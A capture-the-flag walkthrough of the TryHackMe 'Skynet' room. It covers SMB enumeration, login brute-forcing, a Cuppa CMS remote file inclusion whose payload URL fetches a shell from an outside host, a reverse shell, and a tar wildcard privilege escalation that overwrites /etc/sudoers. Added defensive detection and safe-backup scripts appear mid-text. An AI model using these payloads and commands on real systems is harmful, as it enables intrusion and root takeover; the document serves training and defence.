TryHackMe — Skynet writeup

Hello, welcome to the writeup for the Skynet room from TryHackMe.

Let’s begin with an nmap scan to see what ports are open on the box.

# Nmap

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $sudo nmap -sC -sV -oA nmap/scan 10.10.225.134
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-16 03:20 EST
Nmap scan report for 10.10.225.134
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA PIPELINING UIDL RESP-CODES TOP AUTH-RESP-CODE SASL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 LITERAL+ have post-login OK listed SASL-IR IDLE capabilities ID LOGIN-REFERRALS IMAP4rev1 Pre-login more ENABLE
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h59m46s, deviation: 3h27m51s, median: -5h59m47s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-02-15T20:20:41-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-16T02:20:41
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.70 seconds

So we can see that we have some ports open; let's check SMB first.

# Smb

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $smbclient -L \\\\10.10.225.134\\
Enter WORKGROUP\meowless's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We see two shares that stand out, anonymous and milesdyson. Let's connect to anonymous first, because I suppose that milesdyson's share is protected by a password.

# Smb Anonymous

┌─[meowless@meowless]─[~/thm/skynet]
└──╼ $smbclient \\\\10.10.225.134\\anonymous
Enter WORKGROUP\meowless's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019

So we have a file called attention.txt and a directory called logs. Let's grab attention.txt and see what's inside logs.

# Smb attention.txt & logs

smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 00:42:16 2019
.. D 0 Thu Nov 26 11:04:00 2020
log2.txt N 0 Wed Sep 18 00:42:13 2019
log1.txt N 471 Wed Sep 18 00:41:59 2019
log3.txt N 0 Wed Sep 18 00:42:16 2019
9204224 blocks of size 1024. 5831512 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (1.3 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \logs\>

I chose to take just log1.txt because the rest are empty.

Looking at attention.txt we get this:

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

So it's pretty obvious that we can pull a username out of this:

'miles', 'dyson', 'mdyson', etc.

But let’s check the content of log1.txt

# Log1.txt

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

And I suppose that we can use this as a wordlist. Let's check what's on the webserver.

So this is like a search page; looking at the page source we can see that it is a static page.

So let's start gobuster:

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $gobuster dir -u "http://10.10.225.134" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html --threads 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.225.134
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2021/02/16 03:45:10 Starting gobuster
===============================================================
/index.html (Status: 200)
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)

Right off the bat we find that there's an admin panel, but going to it gives us a 403 Forbidden; going to /ai also gives a 403 Forbidden. But there's /squirrelmail, which we can access, and we could potentially brute-force it with hydra (I just used Burp instead because the wordlist is small), using the wordlist that we found on SMB and some usernames made up from Miles Dyson's name. Let's give it a try.

milesdyson seems the best username given his name, so I tried that.

Immediately I see a different response code and length, which could indicate a successful login attempt.

Trying to log in with that actually works.

Browsing to the Samba Password Reset mail we can see a password for his private SMB share (the one that we saw earlier). Let's try to log in:

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $smbclient \\\\10.10.225.134\\milesdyson
Enter WORKGROUP\meowless's password:
tree connect failed: NT_STATUS_ACCESS_DENIED

I've tried connecting several times but it didn't work, so I thought, maybe if I specify a username it will log me in.

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $smbclient \\\\10.10.225.134\\milesdyson --user=milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 05:05:47 2019
.. D 0 Tue Sep 17 23:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019
notes D 0 Tue Sep 17 05:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019
9204224 blocks of size 1024. 5794320 blocks available
smb: \>

And that worked... Looking in the share we can see just PDFs, but there's a directory called notes; let's check what's inside.

smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 05:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 05:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 05:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 05:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 05:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 05:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 05:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 05:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 05:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 05:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 05:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 05:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 05:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 05:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 05:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 05:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 05:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 05:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 05:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 05:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 05:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 05:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 05:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 05:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 05:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 05:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 05:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 05:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 05:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 05:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 05:01:29 2019
9204224 blocks of size 1024. 5794320 blocks available
smb: \notes\>

A shitload of things, but there's one that stands out, and that is important.txt. Let's check it:

smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \notes\> exit
┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

So let's go to the webserver again, to that location.

There's just this; I looked into the source code of the page but there's nothing hidden, so let's gobuster it:

┌─[meowless@rcarmy]─[~/thm/skynet]
└──╼ $gobuster dir -u "http://10.10.225.134/45kra24zxs28v3yd/" -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html --threads 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.225.134/45kra24zxs28v3yd/
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2021/02/16 04:48:56 Starting gobuster
===============================================================
/index.html (Status: 200)
/administrator (Status: 301)

After not so much time we can see /administrator; let's go there.

Let's try logging in with the credentials that we already know: the password for mail access and the one for SMB.

After I tried cyborg007haloterminator it didn't log me in, so let's try the password that we found in the mail.

None of these two combinations worked, so let's try default credentials, like admin:admin, admin:password, etc.

Nothing worked, so I went on Exploit-DB and searched for Cuppa CMS.

So this is an example of remote file inclusion:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?

Since we have our Cuppa in the /administrator directory, our payload will look like this:

http://10.10.225.134/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt
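From the defender's side, the request above leaves an obvious trace in the web server's access log: a hit on alertConfigField.php whose urlConfig parameter points at an external URL. The script below is an added example, not part of the writeup; the log lines it parses are constructed samples, and the 203.0.113.9 address and port are placeholders.

```shell
#!/bin/bash
# Added example (not from the writeup): flag Apache combined-format access-log
# requests to Cuppa's alertConfigField.php whose urlConfig parameter carries an
# absolute http(s) URL, the remote file inclusion pattern used on this box.

# Reads log lines on stdin and prints "client<TAB>included URL" for every
# request where urlConfig= points at a remote http(s) resource.
flag_rfi_requests() {
    awk '
        # $7 is the request path in combined log format; $1 is the client IP.
        $7 ~ /alertConfigField\.php[?]/ && match($7, /urlConfig=https?:\/\/[^& ]*/) {
            # strip the 10-character "urlConfig=" prefix from the match
            url = substr($7, RSTART + 10, RLENGTH - 10)
            print $1 "\t" url
        }'
}

# Constructed sample log: one normal admin request, one RFI attempt pulling
# shell.txt from an attacker-controlled web server, one local-path attempt
# (not flagged by this check, which only looks for remote URLs).
sample_log() {
    cat <<'EOF'
10.0.0.5 - - [16/Feb/2021:04:50:01 -0500] "GET /45kra24zxs28v3yd/administrator/ HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Feb/2021:04:51:12 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://203.0.113.9:8000/shell.txt HTTP/1.1" 200 320 "-" "Mozilla/5.0"
10.0.0.7 - - [16/Feb/2021:04:52:40 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../config.php HTTP/1.1" 200 210 "-" "curl/7.74"
EOF
}

# Number of flagged requests in the sample log.
count_rfi_hits() {
    sample_log | flag_rfi_requests | wc -l
}

sample_log | flag_rfi_requests
```

Pipe a real access log into flag_rfi_requests to run the same check over live data.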

So let's set up a Python webserver and include a shell on the server.

And boom, we have a shell. Let's send a reverse shell:

┌─[meowless@meowless]─[~/thm/skynet]
└──╼ $nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.14.7.91] from (UNKNOWN) [10.10.225.134] 35114
/bin/sh: 0: can't access tty; job control turned off
$

After stabilizing the shell, I just went searching for SUID binary vulnerabilities, since this room is aimed at beginners.

www-data@skynet:/home/milesdyson$ find / -perm -4000 2>/dev/null
/sbin/mount.cifs
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
www-data@skynet:/home/milesdyson$

Unfortunately, nothing seems to be a vector for us to gain a root shell, so I started poking around.

www-data@skynet:/home/milesdyson/backups$ cat backup.sh 
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@skynet:/home/milesdyson/backups$

This looks very interesting: a cron job that runs every minute.

We can clearly see that it uses an asterisk "*", which is a shell wildcard. There's a simple way to exploit this: the script changes into /var/www/html, and the "*" expands to every filename in that directory, so tar receives those names as arguments; any filename that looks like a tar option is parsed as one when tar archives everything in /var/www/html.

cd /var/www/html
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1

After waiting one minute, we just run sudo bash and that's it.

And now you can cat root.txt and finish the room.
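The fix for the backup script is to never let a shell glob feed filenames to tar as arguments. The script below is an added example, not the box's backup.sh: it audits a directory for option-like filenames and shows a safer tar invocation that archives the same content via -C and "." so that such names are stored as data instead of being parsed as options. The directory layout it builds is constructed for the demo.

```shell
#!/bin/bash
# Added example (not from the writeup): why "tar cf backup.tgz *" is unsafe
# when run as root from a directory other users can write to, and a safer form.
set -u

# List entries in DIR whose names begin with "-". With an unquoted "*" these
# names would land in tar's argument list and be interpreted as options.
find_option_like_names() {
    local dir="$1"
    find "$dir" -mindepth 1 -maxdepth 1 -name '-*' -printf '%f\n' | sort
}

# Safer backup: change into the source directory with -C and name "." as the
# only member, so no filename from the directory ever becomes an argument.
# $1 = directory to back up, $2 = archive path (same layout as the cron script).
safe_backup() {
    local src="$1" out="$2"
    tar cf "$out" -C "$src" .
}

# Count archive members whose name starts with "./--": filenames that the safe
# form stored as ordinary entries rather than consuming as tar options.
count_dash_members() {
    tar tf "$1" | grep -c '^\./--'
}

demo() {
    local work
    work="$(mktemp -d)"
    # Constructed layout: normal web content plus two option-like filenames.
    echo '<html></html>' > "$work/index.html"
    : > "$work/--checkpoint=1"
    : > "$work/--checkpoint-action=exec=sh x.sh"
    printf 'Option-like names in %s:\n' "$work"
    find_option_like_names "$work"
    safe_backup "$work" "$work.tgz"
    printf 'Archive members stored literally: %s\n' "$(count_dash_members "$work.tgz")"
    rm -rf "$work" "$work.tgz"
}

demo
```

Running find_option_like_names over the web root from cron is a cheap detection for this class of attack even where the backup script cannot be changed.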

I really hope you enjoyed reading this writeup; look at my other posts for more :)

Best,
Meowless

Penetration Tester, Cat :)